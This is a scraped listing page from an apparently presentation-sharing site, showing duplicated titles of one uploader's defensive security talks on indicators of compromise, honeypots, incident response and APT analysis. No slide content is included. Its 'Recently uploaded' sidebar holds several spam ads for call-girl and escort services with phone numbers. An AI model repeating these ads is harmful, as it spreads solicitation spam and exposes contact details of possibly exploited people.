Honeycon2014: Mining IoCs from Honeypot data feedsHoneycon2014: Mining IoCs from Honeypot data feeds
Honeycon2014: Mining IoCs from Honeypot data feedsF _
 
Indicators of Compromise Magic: Living with compromise
Indicators of Compromise Magic: Living with compromiseIndicators of Compromise Magic: Living with compromise
Indicators of Compromise Magic: Living with compromiseF _
 
Incident Response Tactics with Compromise Indicators
Incident Response Tactics with Compromise IndicatorsIncident Response Tactics with Compromise Indicators
Incident Response Tactics with Compromise IndicatorsF _
 
Hunting The Shadows: In Depth Analysis of Escalated APT Attacks
Hunting The Shadows: In Depth Analysis of Escalated APT AttacksHunting The Shadows: In Depth Analysis of Escalated APT Attacks
Hunting The Shadows: In Depth Analysis of Escalated APT AttacksF _
 
HITB2013AMS Defenting the enterprise, a russian way!
HITB2013AMS Defenting the enterprise, a russian way!HITB2013AMS Defenting the enterprise, a russian way!
HITB2013AMS Defenting the enterprise, a russian way!F _
 
From russia final_bluehat10
From russia final_bluehat10From russia final_bluehat10
From russia final_bluehat10F _
 
Hacklu2012 v07
Hacklu2012 v07Hacklu2012 v07
Hacklu2012 v07F _
 
2011 hk fyodor-anthony_ppt
2011 hk fyodor-anthony_ppt2011 hk fyodor-anthony_ppt
2011 hk fyodor-anthony_pptF _
 
0nights2011
0nights20110nights2011
0nights2011F _
 

More from F _ (11)

Rsa2016
Rsa2016Rsa2016
Rsa2016
 
Hitcon 2014: Surviving in tough Russian Environment
Hitcon 2014: Surviving in tough Russian EnvironmentHitcon 2014: Surviving in tough Russian Environment
Hitcon 2014: Surviving in tough Russian Environment
 
Honeycon2014: Mining IoCs from Honeypot data feeds
Honeycon2014: Mining IoCs from Honeypot data feedsHoneycon2014: Mining IoCs from Honeypot data feeds
Honeycon2014: Mining IoCs from Honeypot data feeds
 
Indicators of Compromise Magic: Living with compromise
Indicators of Compromise Magic: Living with compromiseIndicators of Compromise Magic: Living with compromise
Indicators of Compromise Magic: Living with compromise
 
Incident Response Tactics with Compromise Indicators
Incident Response Tactics with Compromise IndicatorsIncident Response Tactics with Compromise Indicators
Incident Response Tactics with Compromise Indicators
 
Hunting The Shadows: In Depth Analysis of Escalated APT Attacks
Hunting The Shadows: In Depth Analysis of Escalated APT AttacksHunting The Shadows: In Depth Analysis of Escalated APT Attacks
Hunting The Shadows: In Depth Analysis of Escalated APT Attacks
 
HITB2013AMS Defenting the enterprise, a russian way!
HITB2013AMS Defenting the enterprise, a russian way!HITB2013AMS Defenting the enterprise, a russian way!
HITB2013AMS Defenting the enterprise, a russian way!
 
From russia final_bluehat10
From russia final_bluehat10From russia final_bluehat10
From russia final_bluehat10
 
Hacklu2012 v07
Hacklu2012 v07Hacklu2012 v07
Hacklu2012 v07
 
2011 hk fyodor-anthony_ppt
2011 hk fyodor-anthony_ppt2011 hk fyodor-anthony_ppt
2011 hk fyodor-anthony_ppt
 
0nights2011
0nights20110nights2011
0nights2011
 

Recently uploaded

7.pdf This presentation captures many uses and the significance of the number...
7.pdf This presentation captures many uses and the significance of the number...7.pdf This presentation captures many uses and the significance of the number...
7.pdf This presentation captures many uses and the significance of the number...Paul Menig
 
Regression analysis: Simple Linear Regression Multiple Linear Regression
Regression analysis:  Simple Linear Regression Multiple Linear RegressionRegression analysis:  Simple Linear Regression Multiple Linear Regression
Regression analysis: Simple Linear Regression Multiple Linear RegressionRavindra Nath Shukla
 
Unlocking the Secrets of Affiliate Marketing.pdf
Unlocking the Secrets of Affiliate Marketing.pdfUnlocking the Secrets of Affiliate Marketing.pdf
Unlocking the Secrets of Affiliate Marketing.pdfOnline Income Engine
 
The Coffee Bean & Tea Leaf(CBTL), Business strategy case study
The Coffee Bean & Tea Leaf(CBTL), Business strategy case studyThe Coffee Bean & Tea Leaf(CBTL), Business strategy case study
The Coffee Bean & Tea Leaf(CBTL), Business strategy case studyEthan lee
 
Yaroslav Rozhankivskyy: Три складові і три передумови максимальної продуктивн...
Yaroslav Rozhankivskyy: Три складові і три передумови максимальної продуктивн...Yaroslav Rozhankivskyy: Три складові і три передумови максимальної продуктивн...
Yaroslav Rozhankivskyy: Три складові і три передумови максимальної продуктивн...Lviv Startup Club
 
Call Girls Navi Mumbai Just Call 9907093804 Top Class Call Girl Service Avail...
Call Girls Navi Mumbai Just Call 9907093804 Top Class Call Girl Service Avail...Call Girls Navi Mumbai Just Call 9907093804 Top Class Call Girl Service Avail...
Call Girls Navi Mumbai Just Call 9907093804 Top Class Call Girl Service Avail...Dipal Arora
 
Call Girls In Panjim North Goa 9971646499 Genuine Service
Call Girls In Panjim North Goa 9971646499 Genuine ServiceCall Girls In Panjim North Goa 9971646499 Genuine Service
Call Girls In Panjim North Goa 9971646499 Genuine Serviceritikaroy0888
 
Mysore Call Girls 8617370543 WhatsApp Number 24x7 Best Services
Mysore Call Girls 8617370543 WhatsApp Number 24x7 Best ServicesMysore Call Girls 8617370543 WhatsApp Number 24x7 Best Services
Mysore Call Girls 8617370543 WhatsApp Number 24x7 Best ServicesDipal Arora
 
Monthly Social Media Update April 2024 pptx.pptx
Monthly Social Media Update April 2024 pptx.pptxMonthly Social Media Update April 2024 pptx.pptx
Monthly Social Media Update April 2024 pptx.pptxAndy Lambert
 
Enhancing and Restoring Safety & Quality Cultures - Dave Litwiller - May 2024...
Enhancing and Restoring Safety & Quality Cultures - Dave Litwiller - May 2024...Enhancing and Restoring Safety & Quality Cultures - Dave Litwiller - May 2024...
Enhancing and Restoring Safety & Quality Cultures - Dave Litwiller - May 2024...Dave Litwiller
 
RSA Conference Exhibitor List 2024 - Exhibitors Data
RSA Conference Exhibitor List 2024 - Exhibitors DataRSA Conference Exhibitor List 2024 - Exhibitors Data
RSA Conference Exhibitor List 2024 - Exhibitors DataExhibitors Data
 
A305_A2_file_Batkhuu progress report.pdf
A305_A2_file_Batkhuu progress report.pdfA305_A2_file_Batkhuu progress report.pdf
A305_A2_file_Batkhuu progress report.pdftbatkhuu1
 
Ensure the security of your HCL environment by applying the Zero Trust princi...
Ensure the security of your HCL environment by applying the Zero Trust princi...Ensure the security of your HCL environment by applying the Zero Trust princi...
Ensure the security of your HCL environment by applying the Zero Trust princi...Roland Driesen
 
Call Girls Pune Just Call 9907093804 Top Class Call Girl Service Available
Call Girls Pune Just Call 9907093804 Top Class Call Girl Service AvailableCall Girls Pune Just Call 9907093804 Top Class Call Girl Service Available
Call Girls Pune Just Call 9907093804 Top Class Call Girl Service AvailableDipal Arora
 
M.C Lodges -- Guest House in Jhang.
M.C Lodges --  Guest House in Jhang.M.C Lodges --  Guest House in Jhang.
M.C Lodges -- Guest House in Jhang.Aaiza Hassan
 
The Path to Product Excellence: Avoiding Common Pitfalls and Enhancing Commun...
The Path to Product Excellence: Avoiding Common Pitfalls and Enhancing Commun...The Path to Product Excellence: Avoiding Common Pitfalls and Enhancing Commun...
The Path to Product Excellence: Avoiding Common Pitfalls and Enhancing Commun...Aggregage
 
Boost the utilization of your HCL environment by reevaluating use cases and f...
Boost the utilization of your HCL environment by reevaluating use cases and f...Boost the utilization of your HCL environment by reevaluating use cases and f...
Boost the utilization of your HCL environment by reevaluating use cases and f...Roland Driesen
 
VIP Call Girls Gandi Maisamma ( Hyderabad ) Phone 8250192130 | ₹5k To 25k Wit...
VIP Call Girls Gandi Maisamma ( Hyderabad ) Phone 8250192130 | ₹5k To 25k Wit...VIP Call Girls Gandi Maisamma ( Hyderabad ) Phone 8250192130 | ₹5k To 25k Wit...
VIP Call Girls Gandi Maisamma ( Hyderabad ) Phone 8250192130 | ₹5k To 25k Wit...Suhani Kapoor
 
Lucknow 💋 Escorts in Lucknow - 450+ Call Girl Cash Payment 8923113531 Neha Th...
Lucknow 💋 Escorts in Lucknow - 450+ Call Girl Cash Payment 8923113531 Neha Th...Lucknow 💋 Escorts in Lucknow - 450+ Call Girl Cash Payment 8923113531 Neha Th...
Lucknow 💋 Escorts in Lucknow - 450+ Call Girl Cash Payment 8923113531 Neha Th...anilsa9823
 

Recently uploaded (20)

7.pdf This presentation captures many uses and the significance of the number...
7.pdf This presentation captures many uses and the significance of the number...7.pdf This presentation captures many uses and the significance of the number...
7.pdf This presentation captures many uses and the significance of the number...
 
Regression analysis: Simple Linear Regression Multiple Linear Regression
Regression analysis:  Simple Linear Regression Multiple Linear RegressionRegression analysis:  Simple Linear Regression Multiple Linear Regression
Regression analysis: Simple Linear Regression Multiple Linear Regression
 
Unlocking the Secrets of Affiliate Marketing.pdf
Unlocking the Secrets of Affiliate Marketing.pdfUnlocking the Secrets of Affiliate Marketing.pdf
Unlocking the Secrets of Affiliate Marketing.pdf
 
The Coffee Bean & Tea Leaf(CBTL), Business strategy case study
The Coffee Bean & Tea Leaf(CBTL), Business strategy case studyThe Coffee Bean & Tea Leaf(CBTL), Business strategy case study
The Coffee Bean & Tea Leaf(CBTL), Business strategy case study
 
Yaroslav Rozhankivskyy: Три складові і три передумови максимальної продуктивн...
Yaroslav Rozhankivskyy: Три складові і три передумови максимальної продуктивн...Yaroslav Rozhankivskyy: Три складові і три передумови максимальної продуктивн...
Yaroslav Rozhankivskyy: Три складові і три передумови максимальної продуктивн...
 
Call Girls Navi Mumbai Just Call 9907093804 Top Class Call Girl Service Avail...
Call Girls Navi Mumbai Just Call 9907093804 Top Class Call Girl Service Avail...Call Girls Navi Mumbai Just Call 9907093804 Top Class Call Girl Service Avail...
Call Girls Navi Mumbai Just Call 9907093804 Top Class Call Girl Service Avail...
 
VVVIP Call Girls In Greater Kailash ➡️ Delhi ➡️ 9999965857 🚀 No Advance 24HRS...
VVVIP Call Girls In Greater Kailash ➡️ Delhi ➡️ 9999965857 🚀 No Advance 24HRS...VVVIP Call Girls In Greater Kailash ➡️ Delhi ➡️ 9999965857 🚀 No Advance 24HRS...
VVVIP Call Girls In Greater Kailash ➡️ Delhi ➡️ 9999965857 🚀 No Advance 24HRS...
 
Call Girls In Panjim North Goa 9971646499 Genuine Service
Call Girls In Panjim North Goa 9971646499 Genuine ServiceCall Girls In Panjim North Goa 9971646499 Genuine Service
Call Girls In Panjim North Goa 9971646499 Genuine Service
 
Mysore Call Girls 8617370543 WhatsApp Number 24x7 Best Services
Mysore Call Girls 8617370543 WhatsApp Number 24x7 Best ServicesMysore Call Girls 8617370543 WhatsApp Number 24x7 Best Services
Mysore Call Girls 8617370543 WhatsApp Number 24x7 Best Services
 
Monthly Social Media Update April 2024 pptx.pptx
Monthly Social Media Update April 2024 pptx.pptxMonthly Social Media Update April 2024 pptx.pptx
Monthly Social Media Update April 2024 pptx.pptx
 
Enhancing and Restoring Safety & Quality Cultures - Dave Litwiller - May 2024...
Enhancing and Restoring Safety & Quality Cultures - Dave Litwiller - May 2024...Enhancing and Restoring Safety & Quality Cultures - Dave Litwiller - May 2024...
Enhancing and Restoring Safety & Quality Cultures - Dave Litwiller - May 2024...
 
RSA Conference Exhibitor List 2024 - Exhibitors Data
RSA Conference Exhibitor List 2024 - Exhibitors DataRSA Conference Exhibitor List 2024 - Exhibitors Data
RSA Conference Exhibitor List 2024 - Exhibitors Data
 
A305_A2_file_Batkhuu progress report.pdf
A305_A2_file_Batkhuu progress report.pdfA305_A2_file_Batkhuu progress report.pdf
A305_A2_file_Batkhuu progress report.pdf
 
Ensure the security of your HCL environment by applying the Zero Trust princi...
Ensure the security of your HCL environment by applying the Zero Trust princi...Ensure the security of your HCL environment by applying the Zero Trust princi...
Ensure the security of your HCL environment by applying the Zero Trust princi...
 
Call Girls Pune Just Call 9907093804 Top Class Call Girl Service Available
Call Girls Pune Just Call 9907093804 Top Class Call Girl Service AvailableCall Girls Pune Just Call 9907093804 Top Class Call Girl Service Available
Call Girls Pune Just Call 9907093804 Top Class Call Girl Service Available
 
M.C Lodges -- Guest House in Jhang.
M.C Lodges --  Guest House in Jhang.M.C Lodges --  Guest House in Jhang.
M.C Lodges -- Guest House in Jhang.
 
The Path to Product Excellence: Avoiding Common Pitfalls and Enhancing Commun...
The Path to Product Excellence: Avoiding Common Pitfalls and Enhancing Commun...The Path to Product Excellence: Avoiding Common Pitfalls and Enhancing Commun...
The Path to Product Excellence: Avoiding Common Pitfalls and Enhancing Commun...
 
Boost the utilization of your HCL environment by reevaluating use cases and f...
Boost the utilization of your HCL environment by reevaluating use cases and f...Boost the utilization of your HCL environment by reevaluating use cases and f...
Boost the utilization of your HCL environment by reevaluating use cases and f...
 
VIP Call Girls Gandi Maisamma ( Hyderabad ) Phone 8250192130 | ₹5k To 25k Wit...
VIP Call Girls Gandi Maisamma ( Hyderabad ) Phone 8250192130 | ₹5k To 25k Wit...VIP Call Girls Gandi Maisamma ( Hyderabad ) Phone 8250192130 | ₹5k To 25k Wit...
VIP Call Girls Gandi Maisamma ( Hyderabad ) Phone 8250192130 | ₹5k To 25k Wit...
 
Lucknow 💋 Escorts in Lucknow - 450+ Call Girl Cash Payment 8923113531 Neha Th...
Lucknow 💋 Escorts in Lucknow - 450+ Call Girl Cash Payment 8923113531 Neha Th...Lucknow 💋 Escorts in Lucknow - 450+ Call Girl Cash Payment 8923113531 Neha Th...
Lucknow 💋 Escorts in Lucknow - 450+ Call Girl Cash Payment 8923113531 Neha Th...
 

Phd III - defending enterprise